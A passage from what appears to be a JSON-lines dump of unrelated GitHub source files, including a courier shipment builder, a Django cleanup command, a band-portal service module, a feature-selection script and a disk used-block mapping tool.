Settings\n) -> Serializable[Envelope]:\n    packages = Packages(payload.parcels)\n    options = Options(payload.options, Option)\n    product = Service.map(payload.service).value_or_key\n\n    request = create_envelope(\n        body_content=CreateShipment(\n            AuthenicateAccount=Authenticate(\n                AccountID=settings.account_id,\n                Password=settings.password,\n            ),\n            ConsigneeInfo=AddressInfo(\n                ID=payload.recipient.id,\n                Name=payload.recipient.company_name,\n                Address1=payload.recipient.address_line1,\n                Address2=payload.recipient.address_line2,\n                City=payload.recipient.city,\n                Province=payload.recipient.state_code,\n                Postcode=payload.recipient.postal_code,\n                Contact=payload.recipient.person_name,\n                Phone=payload.recipient.phone_number,\n            ),\n            PackageInfo=PackageInfo(\n                Product=product,\n                Pieces=ArrayOfPieceInfo(\n                    PieceInfo=[\n                        PieceInfo(\n                            Weight=piece.weight.value,\n                            WeightUnit=piece.weight.unit,\n                            Length=piece.length.value,\n                            Width=piece.width.value,\n                            Height=piece.height.value,\n                            DeclaredValue=None,\n                        )\n                        for piece in packages\n                    ]\n                ),\n                Contact=payload.shipper.person_name,\n                Phone=payload.shipper.phone_number,\n                CostCenter=options.ics_courier_cost_center,\n                Refereces=(\n                    ArrayOfString(string=[payload.reference])\n                    if payload.reference is not None\n                    else payload.reference\n                ),\n                NotificationEmail=(\n                    options.email_notification_to or payload.recipient.email_address\n                    if options.email_notification\n                    and any(\n                        [\n                            options.email_notification_to\n                            or payload.recipient.email_address\n                        ]\n                    )\n                    else None\n                ),\n                SpecialInstruction=options.ics_courier_special_instruction,\n                NoSignatureRequired=options.ics_courier_no_signature_required,\n                ShipDate=options.ship_date,\n            ),\n        ),\n    )\n\n    return Serializable(request)\n","repo_name":"danh91/purplship","sub_path":"sdk/extensions/ics_courier/purplship/providers/ics_courier/shipment/create.py","file_name":"create.py","file_ext":"py","file_size_in_byte":4214,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"6"}
{"seq_id":"19316251233","text":"import datetime\nimport glob\nimport os\nimport sys\nimport time\n\nfrom django.core.management.base import BaseCommand\n\nfrom src.settings import *\nfrom src.models import *\nfrom src.console import send_notify_emails\n\n\nclass Command(BaseCommand):\n    help = 'Cleans up old job results from database and folders.'\n\n    def add_arguments(self, parser):\n        parser.add_argument('--days', type=int, help='Days in the past considered obsolete; the default of 3 months is 90.')\n\n    def handle(self, *args, **options):\n        t0 = time.time()\n        self.stdout.write('%s:\\t%s' % (time.ctime(), ' '.join(sys.argv)))\n        N_days = options['days'] if options['days'] else KEEP_JOB * 30\n\n        t = time.time()\n        self.stdout.write(\"Cleaning up obsolete job results...\")\n\n        all_job = JobIDs.objects.filter(date__range=(datetime.date(1970, 1, 2), datetime.date.today() - datetime.timedelta(days=N_days)))\n        N_obsolete = 0\n\n        for job in all_job:\n            try:\n                if job.type == '1':\n                    obj = Design1D.objects.get(job_id=job.job_id)\n                elif job.type == '2':\n                    obj = Design2D.objects.get(job_id=job.job_id)\n                elif job.type == '3':\n                    obj = Design3D.objects.get(job_id=job.job_id)\n\n                obj.delete()\n                # format the glob pattern before globbing, not after\n                for f in glob.glob('%s/data/%sd/result_%s.*' % (MEDIA_ROOT, job.type, job.job_id)):\n                    os.remove(f)\n            except Exception:\n                pass\n\n            job.delete()\n            N_obsolete += 1\n\n\n        all_files = set()\n        N_orphan = 0\n        for i in xrange(3):\n            for f in glob.glob('%s/data/%sd/result_*.*' % (MEDIA_ROOT, i + 1)):\n                all_files.add(f[f.find('/result_') - 2: f.rfind('.')])\n\n        for f in all_files:\n            
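# Each entry in all_files has the form '<N>d/result_<job_id>' (built by the\n# slicing above); recover the job id and type, then remove files whose job row\n# no longer exists in the database.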
job_id = f[f.find('result_') + 7:]\n job_type = f[:f.find('/') - 1]\n if job_type == '1':\n obj = Design1D.objects.filter(job_id=job_id)\n elif job_type == '2':\n obj = Design2D.objects.filter(job_id=job_id)\n elif job_type == '3':\n obj = Design3D.objects.filter(job_id=job_id)\n\n if not len(obj):\n for ff in glob.glob('%s/data/%s.*' % (MEDIA_ROOT, f)):\n os.remove(ff)\n try:\n job = JobIDs.objects.get(job_id=job_id)\n job.delete()\n N_orphan += 1\n except Exception:\n pass\n\n self.stdout.write(\" \\033[92mSUCCESS\\033[0m: \\033[94m%s\\033[0m obsolete job result files removed.\" % N_obsolete)\n self.stdout.write(\" \\033[92mSUCCESS\\033[0m: \\033[94m%s\\033[0m orphan job result files removed.\" % N_orphan)\n self.stdout.write(\"Time elapsed: %.1f s.\\n\" % (time.time() - t))\n\n if not DEBUG:\n t_now = datetime.datetime.now().strftime('%b %d %Y (%a) @ %H:%M:%S')\n send_notify_emails('{%s} SYSTEM: Quarterly Cleanup Notice' % env('SERVER_NAME'), 'This is an automatic email notification for the success of scheduled quarterly cleanup of the %s Server local results.\\n\\nThe crontab job is scheduled at 00:00 (UTC) on 1st day of every 3 months.\\n\\nThe last system backup was performed at %s (PDT).\\n\\n%s Admin\\n' % (env('SERVER_NAME'), t_now, env('SERVER_NAME')))\n self.stdout.write(\"Admin email (Quarterly Cleanup Notice) sent.\")\n\n self.stdout.write(\"All done successfully!\")\n self.stdout.write(\"Time elapsed: %.1f s.\" % (time.time() - t0))\n","repo_name":"DasLab/Server_Primerize","sub_path":"src/management/commands/cleanup.py","file_name":"cleanup.py","file_ext":"py","file_size_in_byte":3552,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"6"} +{"seq_id":"21487124382","text":"from django.urls import path\nfrom items.views import item_list_view, item_create_view, item_dynamic_lookup_view, item_base_view, my_item_view, edit_item_view\n\nurlpatterns = [\n\n path('create/', item_create_view, name='createitem'),\n path('/', item_dynamic_lookup_view, name='lookupitem'),\n path('myitem/', my_item_view, name='myitem'),\n path('edit//', edit_item_view, name='edititem'),\n]\n","repo_name":"eddylau328/tradable","sub_path":"Tradable/items/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":425,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"8939046298","text":"import requests\nimport json\nimport os\nimport operator\n\ndata = requests.get(\"http://etcweb.princeton.edu/mobile/map/json.php\")\ncontent = data.content\nlocations = json.loads(content)[\"location\"]\n#We want to reorganize how the loaded json is key-valued\nd = {}\nfor loc in locations:\n code = int(loc[\"location_code\"])\n del loc[\"location_code\"]\n d[code] = loc\n#Now we save line by line\nf = open(os.path.join(os.path.dirname(__file__), \"../campus_map_bldgs_info.py\"), \"w\")\nf.write(\"campus_info = {\\n\")\nl = sorted(d.items(), key=operator.itemgetter(0))\nfor k,v in l:\n f.write(\" %d: {\\n\" % k)\n for k1,v1 in v.iteritems():\n if type(v1) == unicode:\n if \"'\" in v1:\n f.write(u\" u'%s': u'''%s''',\\n\" % (unicode(k1),unicode(v1)))\n else:\n f.write(u\" u'%s': u'%s',\\n\" % (unicode(k1),unicode(v1)))\n else:\n if type(v1) == list and len(v1) > 0 and type(v1[0]) == dict:\n v1 = sorted(v1, key=operator.methodcaller('get', 'name'))\n f.write(u\" u'%s': %s,\\n\" % (unicode(k1),unicode(v1)))\n f.write(\" 
},\\n\")\nf.write(\"}\")\nf.close()\n\n","repo_name":"epkugelmass/USG-srv-dev","sub_path":"tigerapps/pom/scripts/makeBldgsInfo.py","file_name":"makeBldgsInfo.py","file_ext":"py","file_size_in_byte":1137,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"6"} +{"seq_id":"38797325376","text":"import csv\nimport math\nimport numpy as np\nfrom collections import defaultdict\nimport random\nimport naive_bayes_data\n\n#total_documents = 0.0\nwriter_list = ['austen','dickens','shakespeare','et-al']\n# writers = {}\n# writer_word_counts = {}\n# encountered_words = set()\n# dev_data = {}\n# dev_data_size = 0.0\n\n\n\"\"\"\nRandomly removes 10% of the data for purposes of testing parameters and features\n\"\"\"\ndef split_10_data(full_data):\n data_10_per = {}\n data_90_per = {}\n for writer in writer_list:\n doc_list = list(full_data[writer])\n docs_10_per = [doc_list.pop(random.randrange(len(doc_list))) for i in range(int(len(doc_list)/10.0))]\n data_10_per[writer] = docs_10_per\n data_90_per[writer] = doc_list\n return data_90_per, data_10_per\n\n\ndef expected_information(sample_sizes):\n exp_inf = 0.0\n total_sample_size = sum(sample_sizes) * 1.0\n if total_sample_size == 0:\n return 0\n probs = [sample_sizes[i]/total_sample_size for i in range(len(sample_sizes))]\n for prob in probs:\n if prob != 0:\n exp_inf += prob * math.log(prob,2)\n return -1 * exp_inf\n \n\n\ndef entropy(word,sample):\n has_word = []\n no_has_word = []\n for author in sample:\n has_word.append(0.0)\n no_has_word.append(0.0)\n for doc in sample[author]:\n if word in doc:\n has_word[-1] += 1\n else:\n no_has_word[-1] += 1\n ent = 0.0\n total_docs = sum(has_word) + sum(no_has_word)\n ent += sum(has_word)/total_docs * expected_information(has_word)\n ent += sum(no_has_word)/total_docs * expected_information(no_has_word)\n return ent\n\ndef information_gain(word,sample):\n sample_sizes = [len(sample[author]) for author in sample]\n return expected_information(sample_sizes) - entropy(word,sample)\n\n\ndef split_information(word,sample):\n has_word = []\n no_has_word = []\n for author in sample:\n has_word.append(0.0)\n no_has_word.append(0.0)\n for doc in sample[author]:\n if word in doc:\n has_word[-1] += 1\n else:\n no_has_word[-1] += 1\n total_docs = sum(has_word) + sum(no_has_word)\n split = 0.0\n if sum(has_word) != 0:\n split += sum(has_word)/total_docs * math.log(sum(has_word)/total_docs,2)\n if sum(no_has_word) != 0:\n split += sum(no_has_word)/total_docs * math.log(sum(no_has_word)/total_docs,2)\n return -1 * split\n\ndef gain_ratio(word,sample):\n split_info = split_information(word,sample)\n info_gain = information_gain(word,sample)\n if split_info == 0:\n return 0\n return info_gain/split_info\n\n\ndef c45(sample,depth,encountered_words,split_words):\n best_ratio = (0.0,'')\n for word in encountered_words:\n if word in split_words:\n continue\n word_ratio = gain_ratio(word,sample)\n if word_ratio > best_ratio[0]:\n best_ratio = (word_ratio,word)\n if best_ratio[0] == 0:\n return []\n attr = best_ratio[1]\n if depth < 2:\n has_attr = {}\n no_has_attr = {}\n has_attr_length = 0.0\n no_has_attr_length = 0.0\n for author in sample:\n has_attr[author] = []\n no_has_attr[author] = []\n for doc in sample[author]:\n if attr in doc:\n has_attr[author].append(doc)\n has_attr_length += 1\n else:\n no_has_attr[author].append(doc)\n no_has_attr_length += 1\n left_words = []\n right_words = []\n new_split_words = split_words + [attr]\n if has_attr_length > 0:\n left_words = c45(has_attr,depth + 
1,encountered_words,new_split_words)\n if no_has_attr_length > 0:\n right_words = c45(no_has_attr,depth + 1,encountered_words,new_split_words)\n return [attr] + left_words + right_words\n else:\n return [attr]\n\n\n\ndef main():\n data_holder = naive_bayes_data.naive_bayes_data(['austen','dickens','shakespeare','et-al'])\n used_features = set()\n for i in range(10):\n print('starting new iteration')\n data_90,data_10 = split_10_data(data_holder.writers)\n used_features.update(set(c45(data_10,0,data_holder.encountered_words,[])))\n print(used_features)\n\n\nif __name__ == '__main__':\n main()","repo_name":"matsonb/Data_Mining","sub_path":"tree-selection.py","file_name":"tree-selection.py","file_ext":"py","file_size_in_byte":4346,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"17808702599","text":"from django.utils.translation import gettext as _\nfrom django.contrib.auth.models import User\n\nimport uuid\nfrom loguru import logger\nfrom datetime import datetime\nfrom slugify import slugify\nimport os\nimport shutil\nimport re\nfrom zipfile import ZipFile\n\nfrom .exceptions import *\nfrom .models import *\nfrom .logic import *\nfrom .forms import *\nfrom tid_portal import settings\n\n__all__ = ['SongManager', 'ProjectEventManager', 'ProjectManager', 'TabulatureManager',\n 'ProjectResourceFileManager', 'ProjectURLManager', 'ProjectTaskManager']\n\nlogger.add(settings.BASE_DIR + \"/debug.log\", format=\"{time} {level} {message}\", rotation=\"2 week\", compression=\"zip\")\n\n\nclass SongManager():\n \"\"\" Manages songs - create/update songs, manage live list content and ordering \"\"\"\n\n\n @staticmethod\n def update_song_by_post_data(request_POST: dict, request_FILES: dict) -> bool:\n \"\"\" Check request data and update song. 
Return True on successful save, otherwise False \"\"\"\n\n        song_id = request_POST.get('song_id', False)\n        song_name = request_POST.get('song_name', False)\n        song_tempo = request_POST.get('song_tempo', False)\n        song_artist = request_POST.get('song_artist', False)\n        song = None  # avoid a NameError below when neither branch matches\n        if(song_id):\n            song = Song.objects.get(pk = song_id)\n            logger.info(\"Updating existing song by POST data\")\n        elif(song_name and song_tempo and song_artist):\n            song = Song()\n            logger.info(\"Creating song by POST data\")\n\n        if(song):\n            song.played_now = request_POST.get('song_played', False)\n            song.artist = song_artist\n            song.name = song_name\n            song.tempo = song_tempo\n            # Handle tab\n            song_tabulature = request_POST.get('song_tabulature', False)\n            if(request_FILES and 'song_tabulature_file' in request_FILES):\n                song_tabulature_file = request_FILES['song_tabulature_file']\n            if(song_tabulature and song_tabulature != 'None'):\n                song.tabulature = Tabulature.objects.get(pk = song_tabulature)\n            elif(request_FILES and 'song_tabulature_file' in request_FILES and song_tabulature_file):\n                tabulature = Tabulature()\n                tabulature.name = \"{} - {}\".format(song.artist, song.name)\n                tabulature.save()\n                tabulature.create_tabulature_file(song_tabulature_file, True)\n                song.tabulature = tabulature\n            else:\n                song.tabulature = None\n\n            song_lyrics = request_POST.get('song_lyrics', False)\n            if(song_lyrics and song_lyrics != 'None'):\n                song.lyrics = Lyrics.objects.get(pk = song_lyrics)\n            elif (request_FILES and 'song_lyrics_file' in request_FILES):\n                song_lyrics_file = request_FILES['song_lyrics_file']\n                lyrics = Lyrics()\n                lyrics.file.save(song_lyrics_file.name, song_lyrics_file)\n                lyrics.save()\n                song.lyrics = lyrics\n            else:\n                song.lyrics = None\n            #\n            song.save()\n            return True\n        return False\n\n    @staticmethod\n    def live_list_update(request_POST: dict) -> bool:\n        \"\"\" Update live list ordering \"\"\"\n\n        ordering = request_POST.get('ordering', False)\n        songs = Song.objects.all()\n        for song in songs:\n            song.live_position = 0\n            song.save()\n        position = 1\n        for i in ordering.split(','):\n            song = Song.objects.get(pk=i)\n            song.live_position = position\n            song.save()\n            position += 1\n\n\nclass ProjectEventManager:\n    \"\"\" Manages ProjectEvents creation \"\"\"\n\n\n    @staticmethod\n    def create_event(request_POST: dict, project_slug: str, user: User) -> bool:\n        \"\"\" Create project event by user note \"\"\"\n\n        project = Project.objects.get(slug=project_slug)\n        logger.info(f\"Creating new event for project {project.name}\")\n        projectevent_note = request_POST.get('projectevent_note', False)\n        if (projectevent_note):\n            project_event = ProjectEvent()\n            project_event.author = user\n            project_event.note = projectevent_note.strip()\n            project_event.project = project\n            project_event.pub_date = datetime.now()\n            project_event.save()\n            return True\n        return False\n\n    @staticmethod\n    def create_event_by_status(request_POST: dict, project_slug: str, user: User) -> bool:\n        \"\"\" Create project event from status changes \"\"\"\n\n        project = Project.objects.get(slug=project_slug)\n        logger.info(f\"Creating new event by status change for project {project.name}\")\n        projectevent_note = \"\"\n        status_changed = False\n\n        status_categories = StatusCategory.objects.order_by('id')\n        for category in status_categories:\n            current_project_status = ProjectStatusCategory.objects.filter(project=project, category_id=category.id).first()\n            value = request_POST[\"status_{}\".format(category.id)]\n            if(current_project_status.status.id != int(value)):\n                
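# --- editorial aside (added, hedged; hypothetical example values) ---\n                # e.g. if a \"Recording\" category moves from status 1 to status 2, the block below\n                # appends a line like \"Recording: status changed to <new status>.\" to the note.\n                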
current_project_status.status = StatusValue.objects.get(id=value)\n current_project_status.save()\n projectevent_note = \"{}\\n{}: {} {}.\".format(projectevent_note,\n current_project_status.category,\n _(\"status changed to\"),\n current_project_status.status)\n status_changed = True\n if (projectevent_note):\n project_event = ProjectEvent()\n project_event.author = user\n project_event.note = projectevent_note.strip()\n project_event.project = project\n project_event.pub_date = datetime.now()\n if (status_changed):\n project_event.save()\n return True\n return False\n\n\nclass ProjectManager:\n \"\"\" Manages Project creation \"\"\"\n\n\n @staticmethod\n def project_create(request_POST: dict) -> str:\n \"\"\" Create new project from POST request \"\"\"\n\n logger.info(\"Creating new project\")\n project_name = request_POST.get('project_name', False)\n if (project_name):\n project = Project()\n project.name = project_name\n project.slug = slugify(project_name)\n project.save()\n return project.slug\n return \"\"\n\n @staticmethod\n def project_rename(request_POST: dict, project: Project):\n \"\"\" Rename existing project by POST request \"\"\"\n\n logger.info(\"Renaming project\")\n project_name = request_POST.get('project_name', False)\n check_project = Project.objects.filter(name=project_name).first()\n if(check_project):\n raise ProjectNameAllreadyExists\n if (project_name):\n project.name = project_name\n project.slug = slugify(project_name)\n project.save()\n return project.slug\n return \"\"\n\n @staticmethod\n def add_lyrics(project_slug: str, request_POST: dict, request_FILES: dict) -> bool:\n \"\"\" Create new Lyrics or add existing to project \"\"\"\n\n logger.info(\"Adding lyrics to project\")\n project = Project.objects.get(slug=project_slug)\n project_lyrics = request_POST.get('project_lyrics', False)\n if (project_lyrics and project_lyrics != 'None'):\n project.lyrics = Lyrics.objects.get(pk=project_lyrics)\n elif (request_FILES and 'project_lyrics_file' in request_FILES):\n project_lyrics_file = request_FILES['project_lyrics_file']\n lyrics = Lyrics()\n lyrics.file.save(project_lyrics_file.name, project_lyrics_file)\n lyrics.save()\n project.lyrics = lyrics\n else:\n project.lyrics = None\n project.save()\n return True\n\n @staticmethod\n def add_tabulature(project_slug: str, request_POST: dict, request_FILES: dict) -> bool:\n \"\"\" Create tabulature related to project \"\"\"\n\n logger.info(\"Adding tabulature to project\")\n project = Project.objects.get(slug=project_slug)\n project_tabulature = request_POST.get('project_tabulature', False)\n if(project_tabulature and project_tabulature != 'None'):\n tabulature = Tabulature.objects.get(id=project_tabulature)\n project.tabulature = tabulature\n elif(request_FILES and 'project_tabulature_file' in request_FILES):\n project_tabulature_file = request_FILES['project_tabulature_file']\n tabulature = Tabulature()\n tabulature.name = \"{}\".format(project.name)\n tabulature.save()\n tabulature.create_tabulature_file(project_tabulature_file, True)\n project.tabulature = tabulature\n else:\n project.tabulature = None\n project.save()\n return True\n\n\nclass TabulatureManager:\n \"\"\" Manages Tabulatures and tabulature files \"\"\"\n\n\n @staticmethod\n def create_tabulature_by_post(request_POST: dict, request_FILES: dict):\n \"\"\" Create new tabulature with new tabulature file \"\"\"\n\n logger.info(\"Creating new tabulature with file\")\n form = TabulatureForm(request_POST, request_FILES)\n if(form.is_valid()):\n tab_name = 
form.data['tab_name']\n tab_file = request_FILES['tab_file']\n tabulature = Tabulature()\n tabulature.name = tab_name\n tabulature.save()\n tabulature.create_tabulature_file(tab_file, True)\n\n @staticmethod\n def file_actuality_change(tabulature_file_id: uuid.UUID):\n \"\"\" Toggle tabulature file actuality \"\"\"\n\n logger.info(\"Toggling tabulature file actuality\")\n tabulature_file = TabulatureFile.objects.get(pk=tabulature_file_id)\n tabulature_file.is_actual = not tabulature_file.is_actual\n tabulature_file.save()\n\n @staticmethod\n def file_delete(tabulature_file_id: uuid.UUID):\n \"\"\" Delete tabulature file from Tabulature \"\"\"\n\n logger.info(\"Deleting tabulature file\")\n tabulature_file = TabulatureFile.objects.get(pk=tabulature_file_id)\n tabulature_file.delete()\n\n @staticmethod\n def file_add(tabulature_id: uuid.UUID, request_FILES: dict):\n \"\"\" Add new file to Tabulature \"\"\"\n\n logger.info(\"Adding tabulature file to existing Tabulature\")\n song_tabulature_file = request_FILES['song_tabulature_file']\n if (song_tabulature_file):\n tabulature = Tabulature.objects.get(pk=tabulature_id)\n tabulature.create_tabulature_file(song_tabulature_file, True)\n\n @staticmethod\n def tabulature_archive(username: str, code: int) -> str:\n \"\"\"\n create archive from all actual tabulatures, return archive path\n code - defines songs set: 1 - actual, 2 - not actual\n \"\"\"\n\n directory_name = os.path.join(settings.MEDIA_ROOT, username+\"_archive_tmp\")\n try:\n os.mkdir(directory_name)\n except FileExistsError:\n pass\n\n archive_directory_name = os.path.join(settings.MEDIA_ROOT, username+\"_archive\")\n if(os.path.isdir(archive_directory_name)):\n shutil.rmtree(archive_directory_name)\n os.mkdir(archive_directory_name)\n\n actual_tabulatures = {}\n\n if(code == 1):\n archive_name_base = \"takeitdown_actual\"\n song_list = Song.objects.played_only_on_practice()\n elif(code == 2):\n archive_name_base = \"takeitdown_notactual\"\n song_list = Song.objects.not_played()\n\n # choose actual tabulatures\n for song in song_list:\n if(song.tabulature is None):\n continue\n count = song.tabulature.tab_files.count()\n if(count == 0):\n continue\n for tab in song.tabulature.tab_files.all():\n similarity_counter = 0\n while True:\n search_result = re.search(\"\\.([\\w\\d]+)$\", tab.file.path)\n extension = search_result.group(1)\n new_name = \"{} - {}.{}\".format(song.artist, song.name, extension)\\\n if similarity_counter == 0 \\\n else \"{} - {} {}.{}\".format(song.artist, song.name, similarity_counter, extension)\n\n if(new_name not in actual_tabulatures):\n break\n similarity_counter += 1\n\n actual_tabulatures[new_name] = tab.file.path\n\n # copy tabulatures to directory\n new_files = []\n for new_file_name, filename in actual_tabulatures.items():\n shutil.copyfile(filename, \"{}\\\\{}\".format(directory_name, new_file_name))\n new_files.append(new_file_name)\n\n # archive files\n archive_name = archive_name_base + datetime.now().strftime(\"_%Y_%m_%d__%H%M\") + \".zip\"\n archive_path = os.path.join(settings.MEDIA_ROOT, archive_directory_name, archive_name)\n with ZipFile(archive_path, \"w\") as archive:\n for file in new_files:\n archive.write(\"{}\\\\{}\".format(directory_name, file), file)\n\n\n # delete files\n shutil.rmtree(directory_name)\n\n return archive_path\n\n\nclass ProjectResourceFileManager:\n \"\"\" Manages project resource files \"\"\"\n\n\n @staticmethod\n def create_project_resource_file(project_slug: str, request_POST: dict, request_FILES: dict) -> bool:\n 
\"\"\" Create file related to project \"\"\"\n\n        logger.info(\"Creating new project resource file\")\n        project = Project.objects.get(slug=project_slug)\n        file_description = request_POST.get('project_file_description', False)\n        if(file_description and\n           request_FILES and\n           'project_file' in request_FILES):\n            file = request_FILES['project_file']\n            resource_file = ProjectResourceFile()\n            resource_file.description = file_description\n            resource_file.file = file\n            resource_file.project = project\n            resource_file.save()\n            return True\n        return False\n\n\nclass ProjectURLManager:\n    \"\"\" Manages project related URLs \"\"\"\n\n\n    @staticmethod\n    def create_project_related_url(project_slug: str, request_POST: dict) -> bool:\n        \"\"\" Create URL related to project \"\"\"\n\n        logger.info(\"Creating new project related URL\")\n        project = Project.objects.get(slug=project_slug)\n        url_description = request_POST.get('project_url_description', False)\n        url_path = request_POST.get('project_url_path', False)\n        if(url_description and url_path):\n            related_url = ProjectRelatedURL()\n            related_url.description = url_description\n            related_url.url = url_path\n            related_url.project = project\n            related_url.save()\n            return True\n        return False\n\n\nclass ProjectTaskManager:\n    \"\"\" Manages Project tasks - creation, toggle on finished \"\"\"\n\n    @staticmethod\n    def create_from_post(request_post: dict, project: Project):\n\n        task = ProjectTask()\n        task.project = project\n        user_ids = request_post.getlist(\"users\")\n        task.description = request_post[\"description\"]\n        task.save()\n        for id in user_ids:\n            user = User.objects.get(id=id)\n            task.responsible_persons.add(user)\n\n        task.save()\n\n    @staticmethod\n    def check_finished():\n        pass\n","repo_name":"IAmMaxNotARobot/band_portal","sub_path":"tid_portal/band_portal/services.py","file_name":"services.py","file_ext":"py","file_size_in_byte":15696,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"14472677695","text":"__author__ = 'KevinMortonMacPro'\n\nimport db_access\nimport db_utility\n\nareas = db_access.get_all_areas()\n\n# Formatting\ntemplate = \"{:>5} {:20} {:<20} {:.5} {:<20} \"\nrow = template.format(\"ID\", \"Area Name\", \"# of locations\", \"Avg Value\", \"Category\")\nprint(row)\n\n# ------------------------------------| Formatting functions |------------------------------------\ndef getCategoryString(aList):\n    # Pass a list of categories to get a formatted comma separated string\n    categoryString = ''\n    theCategory = []\n\n    try:\n        for i in aList:\n            theCategory.append(i['name'])\n        countString = len(aList)  # was len(area_category): leaked module-level name, now scoped to the argument\n\n        for i in theCategory:\n            categoryString += i\n            if countString > 1:\n                categoryString += ', '\n            countString += -1\n    except TypeError:\n        categoryString = ''\n    return categoryString\n\n# ------------------------------------| Pretty Print |----------------------------------------------\nfor area in areas:\n    area_id = area['area_id']\n    area_location = db_access.get_locations_for_area(area_id)\n    area_category = db_access.get_categories_for_area(area_id)\n    avgMeasurementString = str( db_utility.get_average_measurements_for_area(area_id))\n\n    if not db_utility.get_average_measurements_for_area(area_id):\n        avgMeasurementString = '--------'\n\n    # Final output\n    row = template.format(area_id, area['name'], len(area_location), avgMeasurementString,getCategoryString(area_category))\n\n    
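# --- editorial aside (added, hedged; hypothetical values mirroring the header row) ---\n    # e.g. template.format(3, \"Harbor\", 2, \"0.512\", \"Boat, Dock\") prints one fixed-width row:\n    # id right-aligned in 5 columns, name/category left-aligned in 20, avg value truncated to 5 chars by {:.5}.\n    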
print(row)","repo_name":"kevnm67/InternetProgrammingFall2015","sub_path":"Assignment_3/dbclasses/db_report.py","file_name":"db_report.py","file_ext":"py","file_size_in_byte":1509,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"18848952564","text":"import argparse\nimport json\nimport logging\nimport sys\n\nfrom pprint import pprint, pformat\n\nfrom . ext4 import get_unused_blocks_ext4\nfrom . ntfs import get_unused_blocks_ntfs\nfrom . xfs import get_unused_blocks_xfs\n\n\ndef prepare_logging(args):\n log_level = logging.ERROR\n\n if args.silent:\n log_level = logging.INFO\n elif args.verbose:\n log_level = max(0, logging.ERROR - 10 * int(args.verbose))\n\n logging.basicConfig(\n stream=sys.stderr,\n level=log_level,\n format=\"[%(levelname)s] [%(asctime)s] %(message)s\")\n\n\ndef get_unused_blocks_from_fs(part, bs):\n fs = part.get(\"fs\")\n\n if fs is None:\n return None\n\n fns = {\n \"ext4\": get_unused_blocks_ext4,\n \"xfs\": get_unused_blocks_xfs,\n \"ntfs\": get_unused_blocks_ntfs,\n }\n\n fn = fns.get(fs[\"name\"])\n\n if fn is None:\n return None\n\n return fn(fs, bs)\n\n\ndef generate_unused_blocks(meta, bs):\n pt = meta.get(\"partitions\")\n\n if pt is None:\n return get_unused_blocks_from_fs(meta, bs)\n\n assert pt['label'] in ['gpt', 'dos']\n assert pt['unit'] == 'sectors' # TODO\n\n unused_sectors = pt.get(\"unpartitioned\", [])\n\n sector_size = meta[\"sector_size\"]\n\n assert sector_size == bs\n\n unused_blocks = unused_sectors\n\n # if sector_size == bs:\n # unused_blocks = unused_sectors\n # else:\n # logging.info(f\"convert unpartitioned space from {sector_size} to {bs} block size\")\n # unused_blocks = [\n # (\n # x * sector_size // bs,\n # y * sector_size // bs\n # ) for x, y in unused_sectors]\n\n logging.debug(f\"unpartitioned space (in {bs} blocks) ({len(unused_blocks)}):\")\n logging.debug(pformat(unused_blocks))\n\n for part in pt[\"partitions\"]:\n offset_bytes = part['start'] * sector_size\n\n assert offset_bytes % bs == 0\n\n offset = (offset_bytes + bs - 1) // bs\n\n blocks = get_unused_blocks_from_fs(part, bs)\n\n logging.debug(f\"partition {part['node']} unused blocks ({len(blocks) if blocks else 0}):\")\n\n if blocks is not None:\n blocks = [(offset + s, offset + e) for s, e in blocks]\n unused_blocks += blocks\n\n logging.debug(pformat(blocks))\n\n return unused_blocks\n\n\ndef generate_used_blocks(path):\n meta = {}\n\n with open(path) as f:\n meta = json.load(f)\n\n bs = meta[\"block_size\"]\n sz = meta[\"size\"]\n\n default_block_size = 512\n\n assert bs != 0 and sz != 0\n assert bs >= 4096\n assert sz % default_block_size == 0\n\n unused_blocks = generate_unused_blocks(meta, default_block_size)\n if not unused_blocks:\n return None\n\n unused_blocks.sort(key=lambda x: x[0])\n\n used_blocks = []\n\n start = 0\n end = sz // default_block_size\n\n for b, e in unused_blocks:\n if start < b:\n used_blocks.append((start, b))\n start = e\n\n if start < end:\n used_blocks.append((start, end))\n\n if bs != default_block_size:\n return [(\n (x * default_block_size) // bs, # round down\n (y * default_block_size + bs - 1) // bs, # round up\n ) for x, y in used_blocks]\n\n return used_blocks\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--meta-file\", type=str, required=True)\n parser.add_argument(\"--format\", choices=[\"python\", \"json\"])\n\n parser.add_argument(\"-s\", '--silent', help=\"silent mode\", default=0, action='count')\n parser.add_argument(\"-v\", 
'--verbose', help=\"verbose mode\", default=0, action='count')\n\n    args = parser.parse_args()\n\n    prepare_logging(args)\n\n    used_blocks = generate_used_blocks(args.meta_file)\n\n    if args.format == \"json\":\n        json.dump(used_blocks, sys.stdout, indent=4)\n    else:\n        pprint(used_blocks)\n\n    return 0\n\n\nif __name__ == '__main__':\n    sys.exit(main())\n","repo_name":"ydb-platform/nbs","sub_path":"cloud/blockstore/tools/fs/gen_used_blocks_map/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":3883,"program_lang":"python","lang":"en","doc_type":"code","stars":32,"dataset":"github-code","pt":"6"} +{"seq_id":"9650287750","text":"from tornado.web import RequestHandler\r\nfrom tornado.web import gen\r\nfrom controller import sugarGuideController\r\nimport json\r\n\r\n\r\n# Save the sugar-guide questionnaire result\r\nclass AddSugarGuideResult(RequestHandler):\r\n    @gen.coroutine\r\n    def post(self):\r\n        session_id = self.get_argument('session_id')\r\n        gender = self.get_argument('gender')\r\n        age = self.get_argument('age')\r\n        height = self.get_argument('height')\r\n        weight = self.get_argument('weight')\r\n        sugarType = self.get_argument('sugarType')\r\n        diseaseAge = self.get_argument('diseaseAge')\r\n        akin = self.get_argument('akin')\r\n        fm = self.get_argument('fm')\r\n        manyDrinkWc = self.get_argument('manyDrinkWc')\r\n        posion = self.get_argument('posion')\r\n        thirsty = self.get_argument('thirsty')\r\n        visionDown = self.get_argument('visionDown')\r\n        diseaseSpeed = self.get_argument('diseaseSpeed')\r\n        verifyYear = 